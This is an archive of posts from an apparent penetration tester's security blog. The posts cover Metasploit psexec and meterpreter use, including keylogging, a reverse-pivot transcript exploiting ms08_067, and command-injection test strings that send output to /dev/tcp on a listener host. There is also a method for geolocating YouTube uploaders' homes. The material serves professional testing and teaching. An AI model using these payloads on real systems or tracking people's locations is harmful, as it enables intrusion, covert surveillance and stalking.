In Depth Defense

Pauldotcom posts for 2010

2010-12-04T07:52:00.005-05:00

Here is an archive of links to my 2010 Pauldotcom posts.

Tshark/Wireshark SSL Decryption - Lessons Learned
Windows 7 symbolic links and hidden files
Real time Google Hacking
Web Application Penetration Testing - Part 4
Web Application Penetration Testing Script - Part 3
Web Penetration Testing Scripts - Part 2
Web Penetration Testing Scripts - Part 1
Creating per user customized dictionaries with USERPASS
Using Metasploit to control netcat and third party exploits
Exploring the Facebook API
Capturing SSH V1 & V2 Credentials with a MitM ssh honeypot
Resilient SSH Tunneled Meterpreter Session
Nessus Scanning through a Metasploit Meterpreter Session
SSH gymnastics with proxychains
Meterpreter script to unlock the screensaver
Killing the Monkey in the Middle
Running a command on every machine in your AD domain from the command line
Bypassing AV with msfencode -x
Smashing the General Ledger for fun and Profit (AKA Accounting 101 for Penetration Testers)
NOT A CON!!!! (it's a backdoor)
CSAW Challenge - Reflections on Pools of Radiance
Pauldotcom 1-28 Technical Segment - Here's what you missed!
Gone in 60 Seconds

Some new posts

2010-01-14T17:29:00.002-05:00

I've gotten a couple emails asking where I went. For those that do not know I've been posting on Pauldotcom.com. In the future I will post my entries here also, but really... You should follow pauldotcom.com!!!! :) See you there.

Wireless Access Points Defcon 2004 style

GINA Authentication Bypass

Shmoocon tickets. See you there!

All your Active Directory Computer objects - Gone in 60 seconds

Authentication Bypass in Gina Replacements.

2009-11-25T11:47:00.000-05:00

http://pauldotcom.com/2009/11/authentication-bypass-in-gina.html

Layer 1 Port knocking

2009-11-04T21:11:00.001-05:00

Maybe not, but its pretty cool!

TCP Fragment Evasion

2009-08-16T17:25:00.003-04:00

Originally posted on http://pauldotcom.com/2009/08/tcp-frament-evasion-attacks.html

By: Mark Baggett

I recently read a very good article on tuning Snort's Stream5 preprocessor to avoid "TCP Fragment Overlap" attacks. It's a great article, but the wording confused me. I thought to myself, "TCP Fragments, that must be a mistake. The TCP Header doesn't have a 'more fragments bit', a 'fragment offset' or anything to support fragmentation. How can there be any TCP fragments?" Typically when we talk about fragmentation attacks we think about Layer 3 attacks. Attackers manipulate the IP packet headers to pull off various insertion and evasion attacks. Examples of layer3 attacks include overlapping fragment attacks and temporal evasion (host reassembly timeout evasion). These attacks are explained pretty well in an article titled "Evading NIDS, revisited".

So what is TCP or Layer 4 "fragmentation"? Really, its overlapping or retransmitted datagrams with the same TCP Sequence number. To demonstrate the concept I fired up a virtual machine running Backtrack 3. I ran a netcat listener on my host (nc -l -p 9000) and used a netcat client in backtrack to connect to it. I fired up wireshark to watch the packets and I transfered the text "This is a test of the emergency broadcast system. If it were an actual emergency" between the two hosts. This is what Wireshark captured.

Figure #1

Perfect. Exactly what we would expect. Since my packet doesn't exceed the MTU of the established TCP connection a single packet is transfered to the client with a single acknowledgment in return. If it had exceeded the MTU it still wouldn't have fragmented. It would have sent more than one datagram, each with its own unique IP ID.

Then I created a fragroute configuration file with one line in it:

tcp_seg 16

This will cause fragroute to break the packets down so that they can only carry 16 bytes of TCP traffic. I start fragroute (fragroute -f ~/myfrag.conf 192.168.100.12) and transfer the same text between the hosts...

Figure #2

Fragroute works as expected and breaks the packets down such that only 16 bits of data can be transfered in each packet. Each packet sequence number increases by the number of bytes transmitted. Sequence numbers increase in order. Also, notice that each packet has its own unique IP ID field. There is NO FRAGMENTATION. The "More Fragments bit" isn't set. The fragment offset isn't set. No fragments. Instead, fragroute is transferring packets as if the MTU of the segment is only enough for 16 TCP bytes.

So now lets do some "tcp fragmentation overlaps". I change my fragroute.conf file to say this:

tcp_seg 16 new

This will cause fragroute to transmit frames with overlapping sequence numbers. This attack takes advantage of the fact that the TCP layer doesn't pass data up the stack to the application until it has acknowledged the data and that packets are acknowledged in sequential order. So if we skip datagram #3 and transmit datagrams #4, #5 and #6, duplicates of #4 and overlaps of #5 and #6 then the TCP stack needs to hold datagrams #4,#5 and #6 (as long as they are within the window size) and figure out what to do with duplicates/overlaps once it receives fragment #3.

To see this in action I fire up fragroute and retransmit the text "This is a test of the emergency broadcast system. If it were an actual emergency"

Figure #3

Lets look at it in the fragroute packets in figure#3. The first two datagrams (#1 and #2) are garbage. Their payload is random junk. Then fragroute transmits good data in packets 4 and 5. The payload here is the end of our payload "If this had been an actual emergency." After the 4th packet the receiving host begins screaming to the transmitting client "HEY DUDE, ACK 2933750986. I didn't get that one yet". The receiving TCP stack is complaining about not receiving the first datagram. Then fragroute sends 2 packets with 32 TCP bytes in each. These two datagrams include the FIRST datagram (Notice packet #10 has the lowest sequence number and the embedded text payload). Parts of these two packets overlap packets 1 and 2. Packet #9 overlaps 16 bytes of packet #2. 16 bytes of packet #10 overlap packet #1. If the TCP reassembly engine favors NEW packets then it will reassemble the text as expected. If the IDS reassembles the packets favoring the OLD packets then we can bypass the IPS. If we were drawing analogies to layer three fragment attacks holding the low sequence number datagrams is equivalent to setting the "more fragments bit" and the sequence number is the equivalent to the fragment offset. So how to fix this? The attacks aren't new. Snort has the STREAM5 preprocessor. Just be sure that you tune STREAM5 just like your FRAG3 preprocessor.

References

Snort's Stream5 and TCP overlapping fragments An article by Richard Bejtlich that sparked my interest in this topic. Its a very good article with more explanation on tuning the snort preprocessor.

Posts moving to PaulDotCom

2009-06-28T22:18:00.003-04:00

I'm joining the guys at Pauldotcom. They have invited me to post my blog entries on their site. As posts go up on their site I'll provide a link to them here and I'll post some less technical notes here. I'm pretty excited about the opportunity to work with those guys and looking forward to it.

Don't forget to wipe!

2009-05-22T08:38:00.002-04:00

A while back I assisted the FBI in the collection of evidence of a now convicted sexual offender. The guy had a hard drive full of child porn. My customer had suspicions that an employee in a remote office was accessing inappropriate material on their work computer and asked that I investigate it remotely. After finding one photo of a very young girl among a collection of "normal" porn and discussing it with my customer, I immediately dial my contact with the FBI. (Good contacts are ESSENTIAL don't wait until you need them to try and make them.) Although the young girl was clothed in the picture I saw, the lingerie and pose she was in was very disturbing and you just knew you didn't want to see anything else. At that point I froze; anything else that was touched remotely was altering and potentially destroying evidence on the remote drive. Within an hour the FBI was at the office. He used my machine and the access I had gained to briefly verify the contents of the drive and confirm that it required additional investigation. It did and they dispatched local agents to grab the drive for proper forensic collection.

I spared myself the imagery and let the FBI do what it needed to do using my machine. To me, this story is very interesting. Here a person in a very similar role as the one I played. He could be prosecuted for any residual images left behind on his drive after an investigation.

http://www.theregister.co.uk/2009/05/22/bates_hard_drives/

As far as I know, no CP was ever copied to my hard drive. I had donated a thumbdrive to the cause where all the evidence they needed during that brief investigation was collected. If it is a project I am working on with sensitive data (such as a penetration test) I like to keep everything in TrueCrypt volume making clean up very easy. But in this case, I wasn't driving. It was a windows box and I periodically run "CIPHER /W:C:\" to clean up all the residual files in the free space on the drive, but it’s not something I do religiously. How about you? Well, Cipher is running NOW!

Good enough Compliance??

2009-04-28T14:57:00.004-04:00

Check out this article..

http://www.cio.com/article/102751/Your_Guide_To_Good_Enough_Compliance?page=5&taxonomyId=1419

What is "Good enough Compliance?" You either ARE complaint or you ARE NOT. Its a switch. The article should be a guide to "Good enough security". Good security is no the same a being compliant. I would much rather have good security then being compliant with any given regulation. But good security often covers many of the security requirements outlined in compliance standards. Two things caught came to mind reading the article.

1) Don't trust Sony Pictures with any personal data or credit card information.
2) How many data breaches are REALLY happening?

What does this paragraph suggest?
"According to Behnam Dayanim, a privacy attorney with Paul, Hastings, Janofsky & Walker, state security breach notification laws are among the most frequently ignored types of security regulation. About 35 states have passed security breach notification laws, which lay out, to varying degrees, when an enterprise needs to notify customers and clients if their private information may have been exposed to an unauthorized user. According to CIO and PricewaterhouseCoopers’ “The Global State of Information Security 2006” survey, 32 percent of U.S. organizations admit to not being compliant with state privacy regulations."

According to this paragraph 32% of organizations admit to not being compliant with state privacy laws. The only way to be non-compliant with those laws is to have a breach and not disclose it properly right? That is a significant number of unreported breaches.

Well, at least Myspace did the right thing this past April. Check out their disclosure on April 16th, 2009.
http://www.privacyrights.org/ar/ChronDataBreaches.htm

Interesting story on US Cyber attack

2009-04-23T12:34:00.000-04:00

"Just after midnight on Thursday, April 9, unidentified attackers climbed down four manholes serving the Northern California city of Morgan Hill and cut eight fiber cables in what appears to have been an organized attack on the electronic infrastructure of an American city. Its implications, though startling, have gone almost un-reported."

http://perens.com/works/articles/MorganHill/

Snort 3.0 SANS Paper

2009-04-15T11:04:00.002-04:00

Here is a great SANS GCIA Gold paper for anyone interested in Snort 3.0. Doug also created a very nice bootable live cd with Snort 3.0, Sguil, and other tools from the 503 track. Check him out at http://securityonion.blogspot.com.

http://www.sans.org/reading_room/whitepapers/detection/snort_3_0_beta_3_for_analysts_33068

No exploit Metasploit usage - VNC and Keylogging

2009-03-23T04:55:00.006-04:00

OK. I admit it. I use metasploit at work. Of course, I have permission to use it as a penetration testing tool, but I find it to be very useful in other circumstances as well. I often use the PSEXEC "exploit" to provide username and password to fully patched machines for administrative purposes. For example, it has come in handy when the standard remote access tools have been removed and there is a remote machine that the support center is unable to access. They, rightly so, have figured out that if the security team can get in to their machines without usernames and passwords, it should be pretty easy for them to help recover a managed machine with known usernames and passwords. One option to troubleshoot the broken admin software is to remotely (and temporarily) install VNC on the stranded host. I use to connect to the remote c$ with administrator credentials, copy up vnc, import the required registry keys, start the server, fix the problem, clean up the registry, clean up the files and kill the service. Now I just do this..

./msfcli windows/smb/psexec smbuser=myadminacct smbpass=mypassword smbdomain=companydomain rhost=strandedmachineip payload=windows/vncinject/bind_tcp E

There is no clean up because the tools never reaches the disk of the remote machine. This is very nice. Doug Burks and I have even talked about stripping down ./msfweb to a barebones version that just ask for ip, username and password and launches the VNC session. ./msfwebvnc could be wrapped around a msfd instance on a central server that allows the support center to recover machines. We may do that some day. Comment if that interests you. Now meterpreter has introduced another feature I suspect I will use at work.

I occasionally get asked to run a keylogger on an employees machines. Meterpreter now has this functionality built into it. Before you do this talk with HR and your legal team. In my opinion no employee investigations should ever occur without HR's involvement. Maybe its because wiretap laws make me nervous about using my KeyGhost logger, but anytime I'm dealing with keyloggers I like to talk with our lawyers. I've been told its not a problem many times before, but I check with them first. Meterpreter on the other hand is software and there is no "wire tapping" going on. It should be much less intrusive and your less likely to have the employee notice it. Ask me to tell you the horror story about the USB keylogger and the KVM system some time. Also, I can use meterpreter to keylog a remote office in only a few seconds. So now a keylogger on a remote system is as easy as:

./msfcli windows/smb/psexec smbuser=myadminacct smbpass=mypassword smbdomain=companydomain rhost=monitoredmachineip payload=windows/meterpreter/bind_tcp E

[*] Please wait while we load the module tree...

...

[*] Uploading DLL (75787 bytes)...

[*] Upload completed.

[*] Meterpreter session 1 opened (192.168.100.4:60701 -> 192.168.100.7:4444)

meterpreter > grabdesktop

Trying to hijack the input desktop...

meterpreter > keyscan_start

Starting the keystroke sniffer...

meterpreter > keyscan_dump

Dumping captured keystrokes...

I'm so glad we use this encrypted im channel to exchange sensitive data so the company doesn't catch us. The stolen data is...

meterpreter >keyscan_stop

Interestingly, the keylogger does not capture the usernames and passwords when the user enters them at the screen saver logon prompts. It records ctrl-alt-delete but not the password. This is actually a good thing from my intended use. Not knowing employees passwords protects the integrity of our audit logs.

Metasploit adds new keylogger and Mac payloads

2009-03-22T23:48:00.003-04:00

Metasploit added some pretty interesting payloads to its arsenal this week. First, Meterpreter (the only payload you'll ever need) added a keylogger. Plus, they have added some cool payloads for the Mac. There are a set of isight payloads that will snap a picture from the isight camera (bind_tcp, reverse_tcp, etc). This payload is an part of the "bundle inject" payload which are documented in the Mac OS X hackers handbook this looks like it could be the beginning of a meterpreter like plug-able payload for OSX. Charles Miller, winner of the new Macintosh Powerbooks at both the 2008 and 2009 Pwn2Own contests is coauthor of the payloads along with Dina Dia Zovi. That is definitely a book I will be adding to my library. Here is a recent presentation with some interesting information on the payloads.

SANS 504 - Hacking Techniques, Exploits and Incident Response Augusta, GA

2009-03-21T13:59:00.003-04:00

I'm going to mentor another SANS 504 session this fall. Hacking Techniques, Exploits and Incident response is one of my favorite SANS classes. This is my third mentor session and my second time running 504. Last year SANS gave me the Mentor of the year award so they are giving me some additional flexibility in the mentor format. This time we are running a modified mentor format. We will have 13 more hours of class time than the normal mentor session. That's more time for covering the materials and doing exercises. If your interested get full details and sign up here. Greater Augusta ISSA members contact me for a very special discount code.

Using the free AlienVault.com Nessus feed on your Mac

2009-02-15T17:54:00.005-05:00

Tenable has changed their license and you can no longer use their vulnerability feeds for commercial use. Alienvault.com has a free nessus feed you can subscribe to. It is available for use here. You will notice two update programs there. One for Unix and one for Windows. What about the MAC? To subscribe the nessus feeds on your macintosh do this:

1) Download the linux update script.

2) Update it so it works on your MAC as described below.

First, in the "#Plugin dir" section you will need to to change the line that reads:

NVT_DIR="/var/lib/nessus/plugins/"

NVT_DIR="/Library/Nessus/run/lib/nessus/plugins"

3) chmod +x alienvault-feed-sync.sh

If you run the script by typing :

./alienvault-feed-sync.sh nessus

you will see an error about not being able to find the command "md5sum". The nessus feed update did work, but the script was unable to compare the hashes to verify it completed successfully. That might be good enough for you and you can go about using your updated feeds. BUT, I want to see that those hashes match. Really, it is not buying me much security because I'm downloading the "md5sum" file that I am using for comparison from the same location as the files, but its still a good integrity check. To fix it, you might waste your time as I did and change "findcmd md5sum" in the update script to "findcmd md5" since MD5 is the name of the MD5SUM utility on OS X. But if you do you will get the following error:

"Error: md5sums not correct. Your NVT collection might be broken now."

Why? The version of default version of MD5 that comes with the OS doesn't support the --check (-c) option. For the file check to work you will want to install the version of md5 that is installed on most linux distributions. It is called md5sum and it is available for install through fink.

Happy bug hunting.

Reverse Pivots with Metasploit - How NOT to make the lightbulb

2009-02-04T16:50:00.016-05:00

In a penetration test your target is PII kept on a corporate file server which I will call Victim2. You are outside the firewall but have gained access to an internal host, Victim1, when a user opened your word document with an embeeded Meterpreter payload. The stager embedded in the word document made a REVERSE_TCP connection to your machine which uploaded metsrv.dll to the victim. The machine you have access to (Victim1) has unfiltered access to your target (Victim2). Victim2 is vulnerable to ms08_067_netapi. Victim2 however, has NO access to the internet at all. Were it not for the strict egress firewall rules controlling Victim2 you could have used the ROUTE command to pivot your attack through your meterpreter session on Victim1 to Victim2, and have Victim2 send you a shell directly like this...

Your IP = 192.168.1.1

Victim1 = 10.4.4.4

Victim2 = 10.5.5.5

Background session 1? [y/N] y

msf exploit(ms08_067_netapi) > route add 10.5.5.5 255.255.255.255 1

msf exploit(ms08_067_netapi) > route print

Active Routing Table

====================

Subnet Netmask Gateway

------ ------- -------

10.5.5.5 255.255.255.255 Session 1

msf exploit(ms08_067_netapi) > sessions -l

Active sessions

===============

Id Description Tunnel

-- ----------- ------

1 Meterpreter 192.168.1.1:80 -> 10.4.4.4:1034

msf exploit(ms08_067_netapi) > set RHOST 10.5.5.5

RHOST => 10.5.5.5

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.1

LHOST => 192.168.1.1

msf exploit(ms08_067_netapi) > exploit

And the session would be shoveled back to you from Victim2. BUT, this time, strong egress filters prevailed and you can't make that direct connection. So you decide to relay in back through Victim1 who does have access to the internet. How do you do that?

Here was my first thought. I'll use meterpreter's PORTFWD command on VICTIM1 to setup a TCP relay and back to me. Then I'll exploit Victim2 and set my LHOST to Victim1 (10.4.4.4) and my LPORT to the PORTFWD listener on Victim1. My attack will flow through my pivot and return to me via the PORTFWD on Victim1.

Guess what. You can't do that. LHOST and LPORT have to be a valid IP address on your host or the exploit wont even launch. Metasploit won't let your LHOST be the Victim1. Maybe I could do some CHOST,CPORT trickery (see the advanced options)? I couldn't make that work either.

OK so I can't launch an exploit. But I can make one!

./msfpayload windows/meterpreter/reverse_tcp LHOST=victim1 LPORT=portfwd listener X > custompayload.exe

Then I can use the Upload and Execute payloads to exploit victim2 and get my shell!!

Nope. That doesn't work either. Why? I think there is a bug in PORTFWD.

When you run portfwd and don't provide the OPTIONAL -L ip address it appears to work. You get something like this..

meterpreter > portfwd add -l 6666 -r 192.168.1.1 -p 80

[*] Local TCP relay created: 0.0.0.0:6666 <-> 192.168.1.1:80

But nothing is listening on port 6666. A quick "execute -c -f cmd.exe; interact 1; netstat -na" shows nothing listening on the port. An NMAP of the host confirms no listener...

Macintosh:~ mark.baggett$ nmap 10.4.4.4 -p 6666

Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-03 22:47 EST

Interesting ports on 10.4.4.4:

PORT STATE SERVICE

6666/tcp closed irc

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

Macintosh:~ mark.baggett$

If I try to force the matter with a -L I get a nasty "Cant assign requested address" message.

meterpreter > portfwd add -L 10.4.4.4 -l 6666 -r 192.168.1.1 -p 80

[-] Error running command portfwd: Can't assign requested address - bind(2) /Applications/framework3/lib/rex/socket/comm/local.rb:138:in `bind'/Applications/framework3/lib/rex/socket/comm/local.rb:138:in `create_by_type'/Applications/framework3/lib/rex/socket/comm/local.rb:26:in `create'/Applications/framework3/lib/rex/socket.rb:45:in `create_param'/Applications/framework3/lib/rex/socket.rb:52:in `create_tcp'/Applications/framework3/lib/rex/socket.rb:59:in `create_tcp_server'/Applications/framework3/lib/rex/services/local_relay.rb:184:in `start_tcp_relay'/Applications/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb:219:in `cmd_portfwd'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'/Applications/framework3/lib/rex/ui/text/shell.rb:123:in `call'/Applications/framework3/lib/rex/ui/text/shell.rb:123:in `run'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'/Applications/framework3/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'/Applications/framework3/lib/rex/ui/interactive.rb:48:in `interact'/Applications/framework3/lib/msf/ui/console/command_dispatcher/core.rb:918:in `cmd_sessions'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/rex/ui/text/shell.rb:127:in `run'./msfconsole:82

meterpreter > ipconfig

Parallels OEM Adapter.

Hardware MAC: 00:1c:42:99:40:22

IP Address : 10.4.4.4

Netmask : 255.255.255.0

OK. So maybe there is a bug in portfwd. I punt and I use a different external TCP relay program. I upload and execute FPIPE.EXE and use it on Victim1 to relay the session from Victim2 back to My IP.

fpipe.exe -i 10.4.4.4 -l 5555 -r 80 192.168.1.1

[*] Handler binding to LHOST 192.168.1.1

[*] Started reverse handler

[*] Starting the payload handler...

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)

[*] Sending stage (2650 bytes)

[*] Sleeping before handling stage...

[*] Uploading DLL (75787 bytes)...

[*] Upload completed.

And thats it! Its all good with one VERY IMPORTANT exception. I never get

[*] Meterpreter session 2 opened.

So FAIL, FAIL FAIL. I was unable to pivot a reverse_tcp meterpreter session. I can reach my goal by using the Meterpreter session on Victim1 to access the file server on Victim2 with SMB ports, but thats not very sexy. Ed Skoudis gender bender netcat relays are a good option, but I want to do it with just metasploit. So what is the right way to do this? Do you know? Add a comment!

I know where you live... or at least google does

2009-01-28T20:45:00.010-05:00

Can you use YouTube.com to find out where a video was uploaded? I’m not saying you can. I’m not saying you can’t. But I think it is interesting to try. Using the following method YouTube has led me to the homes of a few people I know. Does it work for you??

Start with YouTubes “Advanced Search”.

http://www.youtube.com/results?search_type=&search_query=#

Click “Advanced Options” and “Show Map”. Type in the userid of the person your trying to location and click the SEARCH box inside the advanced search box (not the one at the top). If the video is in the circle it will be displayed in the result. If not you will see “No Videos found for xyz” and a playlist for the user you are searching for. The difference between a hit/no hit is subtle. Do a search for something you know is geoencoded so you can see the differenece. As a rule, if you see this then the video is not in the circle.

No videos found for “USERXYZ”
Playlist Results for USERXYZ

Zoom in one click at a time making your circle smaller and smaller to see if the video is still in the circle. If search results disappears, its no longer in the circle. Using this method you could take the search down to a city block or so. Then you can switch to http://maps.google.com/ and enable the YouTube overlay. You may find the video is places directly on top of the house where it was uploaded. But a video overlay only appeared in 1 out of the 6 times that I tried to narrow down to a street. It looks like the youtube overlays of Google maps doesn't have as much data as the map search on youtube.

I tested it with 3 video’s where I knew the target street address and in all 3 cases was able to locate their street. In one of the three cases the Google maps overlay displayed the YouTube video on top of the correct house. In one other case I narrowed down a video to a street, but when I asked the account owner about the address he had no idea how that address related to his video although it was within a few miles of his house. There were several cases where I couldn’t get YouTube to return any Geo-encoded video’s on that users account. Its not science, but here is some interesting data being revealed by that search.

UPDATE 1-31: It appears that in the test case where the video led me to a strange location several miles from the account owners home, the video may have been tagged to the geographic center of the zip code of the uploader. This is going to be a significant stumbling block for any open source youtube geotagging missile guidances system projects resulting from this ground breaking research.

WebInspect and Arbitrary Command Execution

2009-01-26T14:38:00.017-05:00

I won't be the first to say it, but its worth repeating; No scanner is a substitute for a human penetration test. That said, I find that WebInspect saves me a lot of time and often either finds vulnerabilities for me OR, just as often, generates error messages that lead me to finding issues pretty quickly. I like to think of it as a web app fuzzer on steroids. Here is a custom signature I've added to help me cover my bases.

When WebInspect scans for arbitrary command execution, it will only detect the flaw when the results of the command execution are returned to the browser. For example, it will inject "; id" into all the field on a page. If it doesn't see "uid=0(root) " (or preferrably the uid for an a less priveleged apache httpd user) returned from the web server somewhere in that response then it doesn't detect the vulnerability. But the web server very well may have executed code invisibly. Consider this example:

A website has a function to submit comments to the website administrator. The comment form takes a field of user input and makes it the subject line of an email to the website administrator. The back end system passes the user input as the -s parameter to /usr/bin/mail sending an email to the admin. If the back end fails to properly sanitize input then WebInspect would successfully inject " /usr/bin/mail -f subject; id" but the results of id would not be returned in the browser and thus go undetected.

Here is something that can make detecting these issues a little easier. Use the "POLICY MANAGER" to add a "CUSTOM CHECK" that does "PARAMETER INJECTION". Have your new custom check send the following command.

";date > /dev/tcp/[your scanner ip address]/80"

As you run your scan have a netcat listener with -L (capital L) running to catch the results as follows:

nc -L -p 80

It will still require some work to figure out exactly which parameter was vulnerable to the attack, but the time displayed in your netcat listener will help to narrow your search.

In addition to injecting a semicolin you will probably want to create all of these signatures as well..

"date > /dev/tcp/[your scanner ip address]/80"

"&date > /dev/tcp/[your scanner ip address]/80"

"`date > /dev/tcp/[your scanner ip address]/80"

"```date > /dev/tcp/[your scanner ip address]/80"

"\ndate > /dev/tcp/[your scanner ip address]/80"

and various combinations of those attacks:

"|&;"date > /dev/tcp/[your scanner ip address]/80"

If "date" doesn't narrow it down for you enough you might try this..

"tail /var/log/apache/access.log > /dev/tcp/[your scanner ip address]/80"

Today is a good day!

2009-01-21T21:18:00.006-05:00

First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge. When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs". Thanks to Ed for putting together a fun challenge. I always learn a lot any time I do anything related to Jedi Master Skoudo.

Challenge results

THEN I see this entry on Wesley's blog on pretending to be a printer with netcat. It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back April 08. Using that technique I was able to shovel command output to netcat running on an arbitrary port. But I really want a bidirectional interactive shell. The thought is this.

1) Share a netcat listener on my linux box over SMB.

2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled

3) Net use lpt1 \\attackerip\netcatshare

4) command.com lpt1

command.com (The 16 bit predecessor to CMD.EXE) allows you to redirect I/O to a device. Seems like it should work. This should be fun.

Infeasibility of Modeling Polymorphic Shellcode

2009-01-20T23:29:00.002-05:00

This is a very interesting paper from some smart people at Columbia University. Here is my layman's summary for the terminally lazy:

Intro (paraphrase):
We are going to model the feasibility of modeling polymorphic shellcode to see if we can rely on antivirus heuristics and behavioral detection techniques.

Body (paraphrase):
Examine a ton of models & do some math that makes my head hurt.

Conclusion:
"Our empirical results demonstrate the difficulty of modeling polymorphic behavior. We briefly summarized the achievements of the shellcoder community in making their code polymorphic and examined ways to improve some of these techniques. We presented analytical methods that can help assess the capabilities of polymorphic engines and applied them to some state-of-the-art engines. We explained why signature–based modeling works in some cases and confirmed that the viability of such approaches matches the intuitive belief that polymorphism will eventually defeat these methodologies. The strategy of modeling malicious behavior leads to an unending arms race with an attacker. Alternatively, whitelisting normal content or behavior patterns (perhaps in randomized ways in order to defend against blending attacks) might ultimately be safer than blacklisting arbitrary and highly varied malicious behavior or content."

Door Schedule Fail

2009-01-10T13:09:00.006-05:00

Huh? I see this sign frequently. So I went ahead and figured it out. The diagram below reveals the door schedule. I assigned a number to each of the times the door is closed, 1=9:30 pm - 4:00 am ; 2 = Monday - Friday; 3= 9:30 pm etc.. So I guess they only unlock the stair wells on weekends when no one is in the office. Must be a security measure. :)

	Sat, Sun	Mon	Tues-Thurs	Friday	Holidays
00:00am-04:00am	1	1,2,5	1,2	1,2,4	1,6
4:01-9:29pm	OPEN	2,5	2	2	6
9:30pm	1,3	1,2,3,5	1,2,3	1,2,3	1,3,6
9:31pm-11:59 pm	1	1,2,5	1,2	1,2	1,6

Metasploit Visual Basic Payloads in action

2009-01-04T17:49:00.005-05:00

John Strand turned me on to this at CDI in December. We were talking about my presentation on the effectiveness of antivirus in detecting metasploit payloads and he asked if I had done any testing on the visual basic payloads. At the time I had not, but now I have to agree with John's assersion that this is potentially a very scary and powerful feature. Metasploit payloads can easily be embedded in Microsoft Office Documents and, as you might expect if you've read my previous blogs, antivirus software does not detect the payloads. I made a video to demonstrate the creation and use of the payloads.

To mitigate these attacks you can use Group policy to set your Office Document Macro Security to HIGH. You could use the Medium setting if you work for that mythical company where users don't ignore security warnings. Here are some helpful links

Setting Macro Levels
Office Group Policy Templates

Or click here to check it out!

SANS Masters Program is great!

2009-01-04T17:31:00.002-05:00

The SANS Masters program is an AWESOME program. First, as any security professional knows, SANS is the premier provider of information security training. In my opinion the tremendous value in the knowledge you get from each individual SANS course is magnified by having them in a structured program that ensures your exposed to the both the depth and breadth of the information security field. You get to rub shoulders and discuss topics with leaders in our field. Last month at SANS CDI I got to talk with Ed Skoudis, Mike Poore, John Strand, Johannes Ullrich, Eric Conrad and others. I had the opportunity to stand up at a SANS conference and give a presentation to a respectable audience which included Stephen Northcutt. What other school program gives you the chance to speak with such a team and PRESENT to Stephen? Throw in the opprotunity to work as a team with other students who are themselves leaders in this field and you have a great program that I am very excited to be a part of.

Check it out at www.sans.edu.

Who would you trust?

2009-01-03T12:26:00.003-05:00

There is no shortage of stories about infected digital picture frames out there. The SANS Internet Storm Center has had several posts on the subject. When Santa brought my daughter a Sakar "Portable Digital Picture Frame" I was sure to scan it with some antivirus software. Sure enough, McAfee reports a Trojan exists in on the device. I checked the Manufacturers support page and found this note on the Product FAQ..

"Does my product have a virus?

No. It has come to our attention that some versions of McAfee Antivirus are warning users about a potential virus in one of our files. We have confirmed that this is a false positive. There is no virus and users can install and use their frame without any fear of a virus infection. To avoid any installation issues, we suggest McAfee be temporarily suspended during installation and use. Users of Symantec and other antivirus products are not affected."

Other antivirus products are not affected. It must just be a McAfee issue right? What does virustotal have to say? 18/38 (47.38%) of the virus scanners out there report it is a virus.

Norman Sandbox says ..

FEnCodeUnicode.dll : INFECTED with W32/Packed_Nspack.A (Signature: W32/Packed_Nspack.A)

So who do you believe? Me? I don't believe either of them. I can either run the software on an isolated machine and looks for signs of malicious activity or return the product and buy one that doesn't require several hours of analysis before we can use it. Hmm..

Jing - OS X Screen Capture & Metasploit Route

2008-12-30T23:03:00.003-05:00

I was trying out jing over the weekend and I like it. Its free screen capture software for your Macintosh. It allows you to capture a movie from your desktop and give it a voice over. Then you can save the contents as an adobe flash movie. It integrates with www.screencast.com and allows you to upload and share files with the world. All for free as long as you stay beneath 2 GB per month. One draw back is it doesn't come with editing software. So unless you use a separate tool you need to get it right in one take. Check it out here.. http://www.jingproject.com

To try it out I made a video (one take) of using Metasploit's route statement to accomplish a true pivot. Route is a command that can be run from within the Metasploit console. It routes attacks through an existing meterpreter session. The route statement is not altering the routing tables on the attacking host. This is also different that the route statement which alters the client host when your are in the Meterpreter session. This route statement alters the routing tables used by Metasploit (see lib/rex/socket/switch_board.rb). Not all Metasploit tools will honor the routes. It seems that those that are built on "Session" objects which uses the "Comm" object honor the routes. Some components (such as auxiliary modules) do not inherit the comm and/or switchboard objects and thus do not honor the routes.

Check the video out here.

msfencoding tips and SANS CDI presentation

2008-12-01T20:14:00.010-05:00

UPDATE 1-21-2009: HD Moore delivered this patched on Christmas Eve. I don't want to start any rumors, but has anyone ever seen HD Moore and Santa Claus in the room at the same time? Google certainly seems to indicate some type of relationship..Hmm

Original Post:

On Dec 15th I am giving a presentation at SANS CDI on my whitepaper on the Effectiveness of Antivirus detecting Metasploit payloads. Metasploit changes CONSTANTLY and I want to be sure my presentation is up to date. So I've been spending some time updating my reasearch. Here is what I learned.

